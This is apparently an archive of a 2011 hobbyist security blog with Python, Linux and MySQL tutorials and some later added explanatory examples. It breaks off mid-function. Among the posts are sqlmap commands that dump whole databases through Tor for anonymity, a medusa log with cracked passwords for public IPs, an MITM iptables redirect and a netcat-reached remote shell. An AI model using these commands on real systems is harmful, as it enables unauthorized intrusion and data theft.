Thursday, November 3, 2011

Python Curses Example / Tutorial

I wanted to make a small example tutorial on getting started with a curses UI in python. We'll get started by creating our screen and adding a simple string;


import curses

screen = curses.initscr()  # Create the screen (enters curses mode)
curses.noecho()            # Keep typed keys from being echoed to the screen
curses.cbreak()            # Deliver key presses immediately, no Enter required
screen.keypad(True)        # Translate arrow/function keys into curses.KEY_* constants
screen.addstr(10, 0, "Resist Monsanto!")  # Write a string at row 10, column 0
screen.refresh()           # Redraw now that the string has been added
# Loop waiting for key events; "q" quits
try:
    while True:
        key = screen.getch()  # Read one key press
        if key == ord("q"):
            break
finally:
    curses.endwin()  # Restore the terminal even if something raised

This should result in a screen with the string "Resist Monsanto!" on it. If we want colours, we first initialise colour support and then create a colour pair;

curses.start_color()
curses.init_pair(1, curses.COLOR_CYAN, curses.COLOR_BLACK) # Creates a color pair as 1 with foreground cyan and background black

We can now use this color pair when adding a string for example;

screen.addstr(10,25,"Resist Monsanto!",curses.color_pair(1)) # Add a COLORED string located at (10,25)


This would result in the following script - http://pastebin.com/0EU7UKqZ

But let's say we want to read a whole line of user input rather than a single key event and store it in a variable. For that we use the window's getstr() method. Here we create a simple function to get our input, called command().

def command():
    curses.echo()  # Let the typed characters show on the screen
    cmd = screen.getstr(0, 1, 15)  # Read up to 15 chars, echoing them at (0,1)
    return cmd

Now that we have our input in the string cmd, let's verify it worked by echoing it back out.

def command():  # Press "c" to start user input
    curses.echo()  # Let the typed characters show on the screen
    cmd = screen.getstr(0, 1, 15)  # Read up to 15 chars, echoing them at (0,1)
    curses.noecho()  # Turn echo back off
    # Write the input back out; colour pair 2 must have been created with
    # curses.init_pair(2, ...) first, the same way pair 1 was above
    screen.addstr(2, 0, cmd, curses.color_pair(2))


This would result in the following - http://pastebin.com/zVzrGz0n

You can use that input for whatever you'd like now, whether you want to run it through subprocess and pipe the output back into the UI, or connect to a server. One caveat if you do hand it to subprocess: pass it as an argument list rather than as a string with shell=True, otherwise whatever the user types (";", "$(...)", backticks) is interpreted by the shell. That sums up this quick example; I'll delve more into it in a later post. Take care!
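As an added example (not code from the original post), here is the pieces above put together into a small curses "command console" that does what the last paragraph hints at: it reads a line with getstr(), runs it through subprocess and shows the output in the window. The part worth copying is the input handling: the line is split with shlex, the program name is checked against an allow-list, and the command is executed without a shell, so a typed `ls; rm -rf ~` is rejected as an unknown command instead of running. The allow-list contents, the key bindings and Python 3 (subprocess.run with capture_output) are assumptions of this example. The pure functions can be exercised without a terminal; the curses loop only runs when the file is executed directly.

```python
import curses
import shlex
import subprocess

# Commands the console is allowed to launch (assumption for this example;
# pick whatever your tool actually needs).
ALLOWED = {"ls", "id", "uname", "date", "whoami"}


def parse_command(line, allowed=ALLOWED):
    """Split a typed line into argv using shell quoting rules, then check the
    program name against the allow-list. Returns (argv, error); one is None."""
    try:
        argv = shlex.split(line)
    except ValueError as exc:  # e.g. an unterminated quote
        return None, "parse error: %s" % exc
    if not argv:
        return None, "empty command"
    if argv[0] not in allowed:
        return None, "command not allowed: %s" % argv[0]
    return argv, None


def run_command(argv, timeout=10):
    """Run argv directly, never through a shell: with shell=True a line such
    as 'ls; rm -rf ~' would execute two commands; here it is one bad name."""
    try:
        proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    except FileNotFoundError:
        return ["not found: %s" % argv[0]]
    except subprocess.TimeoutExpired:
        return ["timed out after %ds" % timeout]
    lines = (proc.stdout + proc.stderr).splitlines()
    return lines + ["[exit %d]" % proc.returncode]


def fit_lines(lines, height, width):
    """Keep the last `height` lines and clip each to the window width, so
    addstr() never raises curses.error for writing past the edge."""
    if height <= 0:
        return []
    return [line[: max(width - 1, 1)] for line in lines[-height:]]


def read_line(screen, y, x, maxlen=80):
    """getstr() with echo turned on only for the duration of the read."""
    curses.echo()
    try:
        raw = screen.getstr(y, x, maxlen)
    finally:
        curses.noecho()
    # Python 3 returns bytes, Python 2 returned str
    return raw.decode("utf-8", "replace") if isinstance(raw, bytes) else raw


def main(screen):
    curses.start_color()
    curses.init_pair(1, curses.COLOR_CYAN, curses.COLOR_BLACK)
    screen.keypad(True)
    output = ["press c to type a command, q to quit"]
    while True:
        screen.clear()
        height, width = screen.getmaxyx()
        screen.addstr(0, 0, "> ", curses.color_pair(1))
        for row, line in enumerate(fit_lines(output, height - 2, width), start=2):
            screen.addstr(row, 0, line)
        screen.refresh()
        key = screen.getch()
        if key == ord("q"):
            break
        if key == ord("c"):
            argv, err = parse_command(read_line(screen, 0, 2))
            output = [err] if err else run_command(argv)


if __name__ == "__main__":
    # wrapper() does initscr/noecho/cbreak/keypad and restores the terminal on exit
    curses.wrapper(main)
```

Run the file in a terminal, press c, type `ls -la /tmp` and the listing appears in the window; type `ls; id` and the console reports "command not allowed: ls;" because shlex keeps the semicolon attached to the word and nothing ever reaches a shell.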

Thursday, October 27, 2011

Python Script for Monitoring a site to see whether it's up or down

Quick script I coded to save me the time of checking whether a site was down; it does the check for me and sends an alert using "libnotify-bin" (notify-send) if the site goes down.

Two methods are available, Ping and HTTP Requests.

If I decide to add more methods, or check from more than one site for the HTTP request (to ensure accuracy), then I'll post an update. Until then I hope you find this useful!

Source - http://pastebin.com/6Aemf2Y8

Monday, October 24, 2011

Python Script to Parse Files for MD5 Hashes

This script demonstrates basic usage of regular expressions to look for MD5s (32 hex characters, i.e. [0-9a-f]{32}) and write them to an output file. One caveat: a bare [0-9a-f]{32} also matches the first 32 characters of any longer hex run such as a SHA-1 or SHA-256, so anchor the pattern with word boundaries or hex look-arounds if the input mixes hash types.

Usage :

Python # python md5parser.py SomeFile.txt MD5list
File parsed ~ 6 hashes found.

Python # cat MD5list
aad3b435b51404eeaad3b435b51404ee
9a5760252b7455deaad3b435b51404ee
0d7f1f2bdeac6e574d6e18ca85fb58a7
9a5760252b7455deaad3b435b51404ee
0d7f1f2bdeac6e574d6e18ca85fb58a7
098f6bcd4621d373cade4e832627b4f6

Script: http://pastebin.com/PPnDs6AU

Python script to parse medusa logs and check if hosts are alive

As the title says, this is a script to parse medusa logs and check whether each host is alive. If a host has been cracked it also displays the password for the service you specified when running medusa. Handy for parsing large medusa logs to see who's up.

Ex.

Python # sudo python check.py /root/medusa.log
Checking for live hosts.
220.XX3.1XX.20 is down...
83.XXX.1X9.246 is up!
Password:r00t3d
186.X2.X5.X is down...
190.XXX.37.XX4 is up!
Password:qwerty
79.1XX.XX9.166 is down...
216.XXX.1X9.106 is up!
Password:L4M3R
89.XXX.13X.39 is down...
136.XX9.XXX.106 is down...
31.44.137.109 is down...
15X.5X.70.X is down...
189.10X.175.X74 is down...
208.124.56.2X9 is down...
129.X3.1X2.1X5 is down... 
X8.4X.39.XXX is up!
Password:[SUCCESS] 
XXX.114.1X0.202 is down...
X2.91.XX.1 is up!
Password:123456
...
 
You can find the script below;

http://pastebin.com/QUUV39KU
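The sample output above shows the weak spot of splitting these lines on whitespace: the empty-password hit came out as "Password:[SUCCESS]". As an added example (not the script linked above), here is a parser that pulls the ACCOUNT FOUND lines with a regex that copes with empty passwords and passwords containing spaces, de-duplicates repeated hits, and checks liveness with a TCP connect to the cracked service's port rather than ICMP, since plenty of hosts that drop ping still answer on the service. The medusa line layout, the service-to-port table and the log lines themselves are assumptions/constructed samples; the liveness check is injectable so the logic runs offline.

```python
import re
import socket
import sys
from collections import OrderedDict

# Constructed sample log. The ACCOUNT FOUND layout is medusa's as far as I
# know; treat it as an assumption and adjust FOUND_RE if your version differs.
SAMPLE_LOG = """\
ACCOUNT CHECK: [ssh] Host: 192.0.2.10 (1 of 3, 0 complete) User: root (1 of 1, 0 complete) Password: toor (1 of 2 complete)
ACCOUNT FOUND: [ssh] Host: 192.0.2.10 User: root Password: toor [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.0.2.11 User: admin Password:  [SUCCESS]
ACCOUNT FOUND: [ftp] Host: 198.51.100.7 User: anonymous Password: my pass word [SUCCESS]
ACCOUNT FOUND: [ssh] Host: 192.0.2.10 User: root Password: toor [SUCCESS]
"""

# Lazy password group plus optional spaces around it: handles "Password: toor",
# "Password: my pass word" and the empty "Password:  [SUCCESS]" case alike.
FOUND_RE = re.compile(
    r"^ACCOUNT FOUND: \[(?P<service>[^\]]+)\] Host: (?P<host>\S+) "
    r"User: (?P<user>\S*) Password: ?(?P<password>.*?) ?\[SUCCESS\]\s*$"
)

# medusa module name -> default port (assumption; extend for your modules)
SERVICE_PORTS = {"ssh": 22, "ftp": 21, "telnet": 23, "vnc": 5900, "http": 80}


def parse_found(log_text):
    """Unique (host, service, user, password) tuples in first-seen order."""
    seen = OrderedDict()
    for line in log_text.splitlines():
        m = FOUND_RE.match(line)
        if m:
            seen.setdefault(
                (m.group("host"), m.group("service"), m.group("user"), m.group("password")),
                None,
            )
    return list(seen)


def tcp_alive(host, port, timeout=3.0):
    """True if a TCP handshake to host:port completes within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def report(log_text, alive=tcp_alive):
    """One line per cracked host/service, in the spirit of the original output."""
    lines = []
    for host, service, user, password in parse_found(log_text):
        port = SERVICE_PORTS.get(service, 0)
        if port and alive(host, port):
            lines.append("%s is up!  [%s] %s:%s" % (host, service, user, password))
        else:
            lines.append("%s is down... (had [%s] %s:%s)" % (host, service, user, password))
    return lines


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    print("Checking for live hosts.")
    print("\n".join(report(text)))
```

Passwords with trailing whitespace are the one thing the lazy group drops; if that matters, log medusa's output in a machine-readable form instead of scraping the human-readable one.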

Python script to look up all the sites hosted on given IP/URL

Here's a script you can use to find all the domains hosted on a given IP or hostname (a reverse-IP lookup). It takes the target as a command line argument, as you can see in the code;

Python # python sharedhosts.py www.monsanto.in
33 sites hosted on IP Address 184.22.117.180
\_________________________________________/
/

http://www.outboards.cn
http://www.sieunhandienquang.com
http://www.medhelp.in
http://www.alibre.cn
http://www.doppelstock.net
http://www.sexhuflit.com
...

I cut the list down to save space, you can find the script below;

http://pastebin.com/BzypB63Q

Monday, October 17, 2011

Python script to parse syslog/audit.log for ssh activity.

I wrote this quick script to parse my audit log for ssh login attempts and then decided to make it usable on my Ubuntu-based box too. Below you can find the source code;

logmon.py


sshmon.py

http://pastebin.com/ehkm5syX

It's pretty straightforward: you run logmon.py and type in ssh to run the sshmon module for your distro (it detects Ubuntu and Red Hat as of right now; you can easily tweak it to meet your needs). I made this for my own use so it's not perfect, and I plan on improving it and adding more modules to suit my needs. If I do, then I'll post updates.
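As an added example (not the sshmon.py linked above), here is the core of such a module: a parser for sshd's syslog lines as written to /var/log/auth.log on Ubuntu, plus the USER_AUTH record auditd writes on Red Hat, feeding a summary that flags a source with repeated failures and, more interesting for an incident, a source that failed repeatedly and then got in. The log lines are constructed; the audit.log field layout is assumed from a typical auditd install, so check it against your own file before relying on AUDIT_RE.

```python
import re
import sys
from collections import Counter, defaultdict

# Constructed sample: OpenSSH syslog lines (Ubuntu layout) and one auditd
# USER_AUTH record (assumed Red Hat layout).
SAMPLE_LOG = """\
Oct 17 03:14:07 box sshd[2212]: Failed password for invalid user admin from 203.0.113.7 port 51234 ssh2
Oct 17 03:14:09 box sshd[2212]: Failed password for root from 203.0.113.7 port 51236 ssh2
Oct 17 03:14:12 box sshd[2218]: Accepted publickey for alice from 198.51.100.4 port 40000 ssh2
Oct 17 03:14:20 box sshd[2230]: Failed password for invalid user oracle from 203.0.113.7 port 51240 ssh2
Oct 17 03:15:00 box sshd[2240]: Accepted password for root from 203.0.113.7 port 51260 ssh2
type=USER_AUTH msg=audit(1318831215.123:456): pid=2301 uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=192.0.2.99 addr=192.0.2.99 terminal=ssh res=failed'
"""

SYSLOG_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\w+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)
AUDIT_RE = re.compile(
    r"type=USER_AUTH .*?acct=\"(?P<user>[^\"]*)\" exe=\"/usr/sbin/sshd\""
    r".*?addr=(?P<src>\S+) .*?res=(?P<result>success|failed)"
)


def parse_ssh_events(text):
    """Normalise both log formats into dicts: src, user, method, ok."""
    events = []
    for line in text.splitlines():
        m = SYSLOG_RE.search(line)
        if m:
            events.append({"src": m.group("src"), "user": m.group("user"),
                           "method": m.group("method"),
                           "ok": m.group("result") == "Accepted"})
            continue
        m = AUDIT_RE.search(line)
        if m:
            events.append({"src": m.group("src"), "user": m.group("user"),
                           "method": "pam",
                           "ok": m.group("result") == "success"})
    return events


def summarize(events, fail_threshold=3):
    """Failure counts per source, usernames guessed per source, sources over
    the brute-force threshold, and logins from a source that had failed before."""
    failures = Counter(e["src"] for e in events if not e["ok"])
    users_tried = defaultdict(set)
    for e in events:
        if not e["ok"]:
            users_tried[e["src"]].add(e["user"])
    return {
        "failures": dict(failures),
        "users_tried": {src: sorted(users) for src, users in users_tried.items()},
        "brute_force_sources": sorted(s for s, n in failures.items() if n >= fail_threshold),
        "success_after_failures": [e for e in events if e["ok"] and failures[e["src"]] > 0],
    }


def report_lines(summary):
    out = ["%s: %d failed logins, users tried: %s"
           % (src, n, ", ".join(summary["users_tried"][src]))
           for src, n in sorted(summary["failures"].items())]
    for src in summary["brute_force_sources"]:
        out.append("WARNING %s looks like a brute-force source" % src)
    for e in summary["success_after_failures"]:
        out.append("ALERT %s logged in as %s via %s after earlier failures"
                   % (e["src"], e["user"], e["method"]))
    return out


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    print("\n".join(report_lines(summarize(parse_ssh_events(text)))))
```

Running it on the sample prints a WARNING for 203.0.113.7 (three failures across admin, oracle and root) and an ALERT for its later password login as root, which is the line you actually want to read first when you open auth.log after the fact.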

Find out which linux version you're running.

Here I will show you a few ways to find out which version of linux you're running, which may come in handy when writing scripts or something of that sort.

uname -a
cat /proc/version
dmesg | grep "Linux version"

You can also find out which distribution release it is like so;

cat /etc/*-release

Saturday, October 8, 2011

Making command aliases to shorten long commands.

I haven't posted in a while, but I wanted to make a quick post on how to make an alias for long commands to reduce your typing. 

For example, if I often have to perform MITM attacks during assessments/pentests, then I may want an alias for the iptables rules. To do this I can create the following aliases;

alias sslrule='iptables -t nat -A PREROUTING -p tcp --destination-port  80 -j REDIRECT --to-ports 10000'
alias rules='echo -e "\033[1;41;1mNAT Rules";iptables -t nat -L -nv;echo -e "\033[1;44;1mPlain Rules";iptables -L -nv;echo -e "\033[0m"'

Now instead of typing out that long rule you can just type sslrule, and to see the rules in a distinctive manner I can just type rules. (Keep in mind that a PREROUTING rule only touches traffic arriving from other hosts, so the box also needs IP forwarding enabled for the redirect to do anything useful.)

Now this isn't a permanent alias; if we want to make it permanent then we'll need to edit our .bashrc file and add the alias there. In my case it is located in /root/.bashrc. From there you can just append the aliases of your choice below the existing ones and you'll have a permanent alias to save you some typing (and carpal tunnel).

Friday, September 9, 2011

Mounting a windows partition

This is a quick "how-to" on mounting a partition in GNU/Linux. First we need to identify which partition we want to mount. To do this we'll issue the fdisk command;

~ # fdisk -l

This lists the partitions; we're looking for a partition that has HPFS/NTFS under the System column.

   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *           1         192     1536000   27  Unknown
/dev/sda2             192        7734    60579043+   7  HPFS/NTFS                  <----
/dev/sda3           29333       30402     8586240   17  Hidden HPFS/NTFS
/dev/sda4            7734       29333   173495297    5  Extended
/dev/sda5           28962       29333     2976768   82  Linux swap / Solaris
/dev/sda6           28591       28962     2972672   82  Linux swap / Solaris
/dev/sda7           18273       18496     1798144   82  Linux swap / Solaris
/dev/sda8            7734       18273    84653056   83  Linux


Now we want to create a directory in our /media/ directory which is where we'll mount the windows partition.

mkdir -p /media/Winblows

Now we're ready to mount it in the directory we just created.

mount -t ntfs -o nls=utf8,umask=0222 /dev/sda2 /media/Winblows

That should successfully mount your Windows NTFS partition in the directory we created. Note that the in-kernel ntfs driver is read-only; for write access use ntfs-3g (mount -t ntfs-3g). If the disk is evidence, or you simply do not want to touch it, add ro to the options so nothing can be written. Hope this helps!

VNC Weak Password Bash Scanner

This is an old bash script I wrote some time ago, it uses the .jar that I coded a while back to parse nmap logs for IP's. You can find the bash script at the following pastebin and the jar used to parse the nmap logs below that.

Script - http://pastebin.com/swQGK6mi

Jar - http://hakhub.blogspot.com/2011/05/bash-scripting-friendly-java-ip-parser.html

Friday, August 26, 2011

Python and Shell Commands (Popen) example

Well I've recently moved back to python after learning PHP/MySQL for a while, so as I learned I coded a small program to issue remote commands. It essentially opens a given socket and waits for a connection; when a connection is established it prompts the user for validation. If validation is successful it passes a shell (limited to /bin tools) which you can use to issue remote commands. It also adds an iptables firewall rule to accept all packets on the port you specified, which it deletes when you exit the shell. All activity is logged to Logfile.log, including failed login attempts and their IP. Keep in mind that the password travels in the clear over the raw TCP connection (the SHA-512 comparison only protects the stored copy) and that the ACCEPT rule opens the port to everyone while the program runs.

Things you can learn from this script: 

User Validation using the hashlib and a sha512'd password 
Command line arguments
Popen shell commands 
Reading/Writing Files
Basic sockets 

I wrote another small script to connect to the host, but in the end I decided to just use netcat instead. Example usage;

Host:
~$ python recon.py 1984

Client:

~$ nc -vv 19.84.20.11 1984

Script - http://pastebin.com/Mx600RA8

Getting started with iptables

Okay so I have probably talked about iptables before, and used it in previous tutorials, but now I've decided to talk about it in particular. iptables is extremely useful and powerful if configured properly. We'll start off with a very basic rule, allowing all inbound connections to the telnet port.

iptables -A INPUT -p tcp --destination-port 23 -j ACCEPT

Now we should be allowing all connections on port 23 (telnet).

We can view the rules we have like so;

iptables -L

If we had wanted to list the table with numeric values instead, use the (-n) flag. In addition, we can specify what rules we want to list (INPUT, OUTPUT, etc) and increase the verbosity to see the packet and byte statistics.

iptables -L INPUT -n -v

Now, that's nice and all but I'd like to filter out SSH on this laptop to drop any packets coming from IP's other than mine. In order to do this, I would issue the following command.

iptables -A INPUT -p tcp --dport 22 ! -s 19.84.20.11 -j DROP

Now any SSH packet whose source IP is not the one I specified is dropped. Note that this is an allow-list of a single address; the opposite approach, block-listing known-bad addresses, is easily circumvented with proxies or Tor. If instead we wanted to accept packets from everyone except a specific IP, we would use the same match with (-j ACCEPT) rather than dropping it.


iptables -A INPUT -p tcp --dport 22 ! -s 19.84.20.11 -j ACCEPT

Now everyone but my home network can ssh into this box. Remember that rules are matched top to bottom and -A appends, so this ACCEPT only has an effect if the chain's default policy, or a later rule, drops what it does not match; with the default ACCEPT policy it changes nothing.

If we wanted to "flush" our chain, we can issue the following command;

iptables -F

That removes all the rules from every chain in the filter table, but leaves the chain policies as they are.
Another nice feature of iptables is the ability to redirect traffic to another port. For example, if we issued the following command we would be redirecting the unwanted SSH traffic to our honeypot's port.

iptables -t nat -A PREROUTING -p tcp --dport 22 ! -s 19.84.20.11 -j REDIRECT --to-ports 1984

Now, nat rules live in a separate table from your average filter rules. If we want to view these rules we need to explicitly specify that it's the nat table we want to see or modify. For example, to view the rules and then flush them we would issue the following;

iptables -t nat -L -nv

iptables -t nat -F

That about wraps it up for my "how to" on getting started with iptables. Hope this helps someone else out there.

Thursday, August 18, 2011

Simple PHP Toolkit

Well I've been learning PHP/MySQL lately, so while learning I decided to make something of use (well... kind of). But I've decided to move to python for my web development, so I'm just posting what I've coded so far for others to play with and learn from. It uses a MySQL database to log in, which you can set up using the queries in my previous post on the hash cracker.

What it has;

Malware String Detector (looks through files for specific strings, which you can specify - I used it for looking through keyloggers for email credentials)
Basic Port Scanner

MD5 Hash Generator/Cracker

Below you can find the tar'd files.

PHP Scripts - http://www.mediafire.com/?g1iwudpkic5vip4
Images - http://www.mediafire.com/?7v2q2r469dn6mie

Wednesday, August 10, 2011

Windows Command Line/Console Alternative

Well I'm a linux guy, therefore I've come to love the CLI...which is unfortunately lacking on windows. I've had a stock windows starter install on this netbook I've been dual booting with and decided to play more with windows and do some malware analysis. I can't stand dealing with microsofts CLI, so I decided to look for an alternative... and I found exactly what I was looking for. "Console" is a Windows console window enhancement.

Console features include: multiple tabs, text editor-like text selection, different background types, alpha and color-key transparency, configurable font, different window style. 

This is a very nice addition for anyone who loves the CLI, and it really helps in customizing Windows to suit me, which makes for a more pleasant experience.

You can find the download here, on sourceforge.

http://sourceforge.net/projects/console/

Sunday, August 7, 2011

Basic PHP Hash Cracker (Updated)

Well I've previously posted the basic hash cracker I had coded in PHP, but it seems the links had died and since I've added MySQL Database functionality I decided I would just make an updated post with both of them and their sources.

To download the original one which doesn't use a SQL DBase and works on free hosting, use this version.

The latest version stores cracked hashes and hashed words in a database, which it then uses when cracking by trying all the plaintext words in the database against the hash. You can download that version here.

To set up the MySQL database, open up your MySQL shell and issue the following queries. (If you need help getting started with setting up a web server / using the MySQL shell, then check out this post.)

~$ mysql -u root -p

mysql> create database HashCracker;

mysql> create table HashCracker.users(UID int not null auto_increment,User varchar(50),Pass varchar(42),primary key(UID));

mysql> create table HashCracker.Hashes(HID int not null auto_increment,String varchar(50),Hash varchar(32),primary key(HID));

mysql> insert into HashCracker.users(User,Pass) values('Username',sha1('Password'));
Now your MySQL database should be all set up and ready for use. Just extract the contents of the tar into your /var/www directory (or whatever your webroot directory is) and log in with the credentials you specified in the query above. Note that sha1('Password') stores an unsalted, fast hash, which is fine for a toy like this but not for anything holding real credentials. If you have any comments feel free to leave them.

Friday, August 5, 2011

Monitor Turns Off After A Few Seconds (FIX)

Well I had this old flat panel radius lying around just taking up room which I thought was broken, but I had given someone an old system including an old monitor from the 90's which I decided wasn't sufficient. I had decided to pull it out and take it apart to see what exactly was wrong as it would turn on and show the desktop for a brief second and then go black. I'm not much of a hardware guy, but lately I've been playing around with things salvaged from my former job. I fixed a brand new 7-in-1 Kodak printer/everything else you can imagine, which they tossed out because they thought it was broken. I also grabbed all the flat panels they were tossing out, and this radius was one of them. After doing some reading I realized this was a good sign the capacitors are dying, and the (temporary) fix didn't require any soldering. I was able to use it by simply turning the brightness down with the few seconds I had to navigate the menu with, then once I turned the monitor on again it had enough energy to stay on, at some point I may have to replace them, but I'm sure I have something lying around I can salvage some from.

Also, using a higher-rated power supply made it usable regardless of brightness or contrast, but I expect switching out the capacitors will eventually need to be done.

Thursday, July 14, 2011

Find out your hardware information in linux

This is very basic, but I hadn't known about it until recently when I was given an old PC which I instantly installed Linux on. I don't do much when it comes to hardware as I can't really afford to... other than other people's stuff I recycle. The quick way to find out all your hardware specs on Linux is "lshw". Turns out it had a 3.00 GHz CPU with a 512 MB stick of RAM and 3 open slots, and I just so happened to have 3 spare 512 MB sticks lying around from other PCs I've recycled. So I ended up with a fully functional 3.00 GHz CPU, 2 GB RAM Linux box, which made me more than happy... as I can't afford much.

Friday, July 8, 2011

Getting started with skipfish.

Well this is another great vulnerability scanner for webapp's, I really like it so far and thought it was well worth a post. So to start off, download skipfish from here. It has a great interface and outputs the results to an HTML file.

To find out more about the tool and the huge number of probes it performs, read their documentation here.

Now assuming you've downloaded the package from the link above, we will need to untar it and compile it with the make command.

~$ tar -xvzf skipfish-2.02b.tgz
~$ cd ./skipfish-2.02b
~/skipfish-2.02b $ make

Now it should have compiled, but if you get an error along the lines of this;

make: cc: Command not found
make: *** [skipfish] Error 127

Then you need to install GCC. You will also need the libidn and OpenSSL development headers (libidn11-dev and libssl-dev on Debian/Ubuntu).

Now assuming we have it all compiled and ready to go, you should have a file called "skipfish" in the current directory. You will have to either specify the wordlist you'd like skipfish to use or copy one from the dictionaries directory into the directory that has skipfish in it. Copying is the safer choice, since skipfish treats the -W wordlist as read-write and may append the keywords it learns during a scan to it.

I'll be specifying one of the dictionaries that come with this tool.

Let's assume we're auditing this blog, we would issue the following command.

~/skipfish-2.02b $ ./skipfish -W dictionaries/complete.wl -o outputdir http://www.hakhub.tk

That'll get skipfish scanning. You can watch the progress via the CLI, and the results will be stored in the "outputdir" you specified, so you can view them in your browser of choice.

~/skipfish-2.02b $ cd
~$ cd ./outputdir
~/outputdir $ firefox index.html

From there, you can analyze the results and perform your audit or fix your code.

Sunday, July 3, 2011

Getting started with MySQL Shell

Okay so I've just recently started getting into web dev and whatnot, but I thought I'd make a quick how-to for getting started with MySQL on the Linux platform.

First off, make sure you've got a LAMP setup (Linux Apache MySQL & PHP). If you're using a debian based distro you can download them with the repositories like so;

sudo apt-get install apache2 mysql-server libapache2-mod-php5 php5-mysql

After those install, you'll want to set a password for your MySQL root account (MySQL SHOULD be running, but it can be started like so; /etc/init.d/mysql start). Be aware that a password given on the command line like this ends up in your shell history; the interactive SET PASSWORD query further down avoids that.

mysqladmin -u root password ThePassword


Now that your password is set, you can log in to MySQL and get to the fun stuff.

mysql -u root -p

You'll be prompted for your pass, after you log in you can start interacting with the DBase. 

/*
Alternatively you can log in without a password, as there is none by default, and then set one with a query like this;

mysql -u root
mysql> SET PASSWORD FOR 'root'@'localhost' = PASSWORD('Yourpassword');

 */

If you wanted to view the existing databases you can issue the following command;

mysql> show databases;

Now to create a DBase you can simply do this;

mysql> create database MonsantosArsenal;

Now if we wanted to move to that DBase we could do the following;

mysql> use MonsantosArsenal;

Now, what's a DBase without tables?

mysql> create table Weapons(
         WepID int,
         Weapon varchar(50)
          );

And that'll create a table named Weapons in the database MonsantosArsenal. You can now begin adding rows with the insert command, but first I want to point out that you can make an integer column increment by 1 automatically. Note that MySQL requires an auto_increment column to be a key, so we declare it as the primary key (drop the table we just made, or pick a new name, before re-creating it);


mysql> create table Weapons(
         WepID int not null auto_increment,
         Weapon varchar(50),
         primary key (WepID)
          );

mysql> insert into Weapons (Weapon)
          VALUES("Genetically modified food");

You now have a table with a column named "Weapon" and one row holding the value we chose to insert. I hope this helps get you started with the mysql shell.

Anonymizing SQL Injections

So I've previously made posts about things like Tor and sqlmap, but I just wanted to make this quick post to show that you can combine the two in order to increase anonymity when doing pentests or what have you. So assuming you have Tor up and running with default settings (if not you can find a how-to here), we will use sqlmap's --tor flag. If your Tor proxy does not listen on the defaults, sqlmap's --tor-port and --tor-type switches let you point it at the right place.

python sqlmap.py -u www.example.com/fuckmonsanto.php?prodID=23 --beep --eta --tor --dump-all

Or, if you're not using the --tor switch or simply having issues, you can use the proxy flag instead. I'll be using polipo, which is chained to Tor, so I will be using localhost and port 8123, the default port used by polipo. You could alternatively use a proxy off the web, but remember that whoever runs that proxy sees all your traffic.

sqlmap -u www.example.com/fuckmonsanto.php?prodID=23 --beep --eta --proxy=http://127.0.0.1:8123 --dump-all

It's sadly as simple as that. Do confirm that the requests really leave via Tor before you rely on it (newer sqlmap versions have a --check-tor switch for exactly this).

Saturday, July 2, 2011

"Linux: can't open /dev/dsp" Festival FIX

Well I've had no problems with festival on my netbook, but when I tried to use it on my desktop I got the error "Linux: can't open /dev/dsp". This is because festival defaults to the outdated OSS interface; to make it use ALSA instead, write the following into ~/.festivalrc (this overwrites any existing file);

printf ";use ALSA\n(Parameter.set 'Audio_Method 'Audio_Command)\n(Parameter.set 'Audio_Command \"aplay -q -c 1 -t raw -f s16 -r \$SR \$FILE\")\n" > ~/.festivalrc

Now you can test to check whether it's working or not.


echo "Resist Monsanto" | festival --tts

Monday, June 27, 2011

Basic PHP Hash Cracker

Well, I had moved from Java to C++ until I got more interested in web security... which led me to stray away from C++ and learn some web dev. Right now I'm learning PHP, and in the process I made this simple hash cracker. Below you can find the source and a very basic dictionary (approx. 19 MB) for testing purposes. You can check out the working version hosted here; if I make any updates to it (such as supplying a hash list instead of a single hash) then I'll update this page or make a new post.
 
Source
Example

Tuesday, June 21, 2011

Java MD5 parser

Well, I don't code in Java much anymore, but I had encountered a task which involved isolating MD5 hashes from a rather large text file, which would have been a pain in the ass to do manually. In addition, I tried awk, grep and sed a bit. They all worked to a lesser degree, but not quite what I was looking for. So I remembered the Java IP parser I coded for parsing nmap logs and pulling the IPs, and just altered the regex to pull MD5s instead of IPs and write them to a file. Because I found it rather helpful, I decided to make a quick post and link the new source and jar file.

I think sed could have actually done the job but I wasn't having any luck and this alternative was extremely easy and quick. Plus it does exactly what I needed.


Usage;

java -jar md5.jar filename.txt
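Both this Java parser and the Python md5parser.py further up do the same job, so here is one added example (not either of the linked scripts) that serves both: it extracts 32-hex values but refuses to match inside a longer hex run, de-duplicates while keeping order, and tags what it found. The tagging is the part the posts' own sample output hints at: aad3b435b51404eeaad3b435b51404ee, which appears in the Python post's output, is not an MD5 at all but the LM hash of an empty password (each 16-hex half is the constant for an empty 7-character chunk), and a value ending in that half belongs to a password of at most 7 characters; a 32-hex value can also be an NTLM hash, which no regex can tell apart from MD5. The input lines are constructed.

```python
import re
import sys
from collections import OrderedDict

# A 32-hex-digit run that is not part of a longer hex run. Without the
# look-arounds, [0-9a-f]{32} also fires inside SHA-1 (40) and SHA-256 (64)
# digests and returns their first 32 characters as bogus "MD5s".
MD5_RE = re.compile(r"(?<![0-9a-fA-F])[0-9a-fA-F]{32}(?![0-9a-fA-F])")

# LM hashes are two independent 8-byte halves; this is the well-known value
# of a half computed over an empty 7-character chunk.
EMPTY_LM_HALF = "aad3b435b51404ee"


def extract_hashes(text):
    """Unique 32-hex values in order of first appearance, lower-cased."""
    return list(OrderedDict.fromkeys(m.group(0).lower() for m in MD5_RE.finditer(text)))


def classify(h):
    """Tag a 32-hex value by what can be told from its format alone."""
    if h == EMPTY_LM_HALF * 2:
        return "LM hash of an empty password"
    if h.endswith(EMPTY_LM_HALF):
        return "LM hash of a password with 7 characters or fewer"
    return "MD5 or NTLM (same length, not distinguishable by format)"


def parse_file(in_path, out_path):
    """Mirror the original usage: read a file, write one hash per line, return the count."""
    with open(in_path, "r", errors="replace") as fh:
        hashes = extract_hashes(fh.read())
    with open(out_path, "w") as out:
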